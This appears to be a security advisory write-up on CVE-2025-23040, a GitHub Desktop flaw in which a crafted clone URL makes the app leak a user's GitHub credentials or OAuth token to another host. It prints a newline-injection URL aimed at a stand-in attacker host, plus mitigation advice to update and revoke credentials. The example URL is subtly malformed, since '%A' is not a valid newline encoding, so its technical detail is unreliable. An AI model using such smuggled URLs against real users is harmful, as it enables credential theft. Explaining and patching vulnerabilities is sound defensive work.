CVE-2025-23040: GitHub Desktop Vulnerability - Remote Credential Theft

Introduction:

GitHub Desktop, an open-source Electron-based GitHub app, has been discovered to have a critical vulnerability (CVE-2025-23040) that can potentially allow an attacker to gain unauthorized access to a user's credentials by exploiting a misconfiguration in the git-credential protocol. This vulnerability is particularly dangerous as attackers can utilize maliciously crafted remote URLs to exfiltrate credentials without the knowledge of the user.

Exploit Details

The exploitation of this vulnerability relies on an attacker convincing the targeted user to clone a repository, either directly or through a submodule. GitHub Desktop uses Git to perform all network-related operations such as cloning, fetching, and pushing. When a user attempts to clone a repository, GitHub Desktop invokes the git clone command. Git then encounters a remote that requires authentication and proceeds to request the credentials for that remote host from GitHub Desktop using the git-credential protocol.

The attacker can use a maliciously crafted URL to mislead the credential request coming from Git. This causes GitHub Desktop to misinterpret the request, resulting in the unintended transmission of the user's GitHub username, OAuth token, or credentials for other Git remote hosts stored in GitHub Desktop to an unrelated host under the attacker's control.

Consider this example of a maliciously crafted URL

https://attacker.example.com%Ahttp.example.org/repo.git

When passed to git clone, the new line character (%A) causes the credential request to be split into two separate requests. GitHub Desktop then sends the user's credentials to attacker.example.com instead of http.example.org.

Mitigation

GitHub Desktop recently released version 3.4.12, which contains a fix for this vulnerability. Users are urged to update to this version immediately to protect their credentials. Additionally, users who suspect they may have been affected should revoke any relevant credentials.

Original References

- GitHub Desktop Security Advisory: GHSA-4444-4hhg-fg57
- GitHub Desktop Release Notes 3.4.12: Release v3.4.12

Conclusion

CVE-2025-23040 is a critical vulnerability in GitHub Desktop that exposes users' credentials to potential theft. By exploiting a misconfiguration in the git-credential protocol, an attacker can gain unauthorized access to a user's GitHub username, OAuth token, or credentials for other Git remote hosts stored in GitHub Desktop. Users are highly encouraged to update their GitHub Desktop to version 3.4.12 or later and revoke any relevant credentials if they suspect they have been affected by this vulnerability.

Timeline

Published on: 01/15/2025 18:15:24 UTC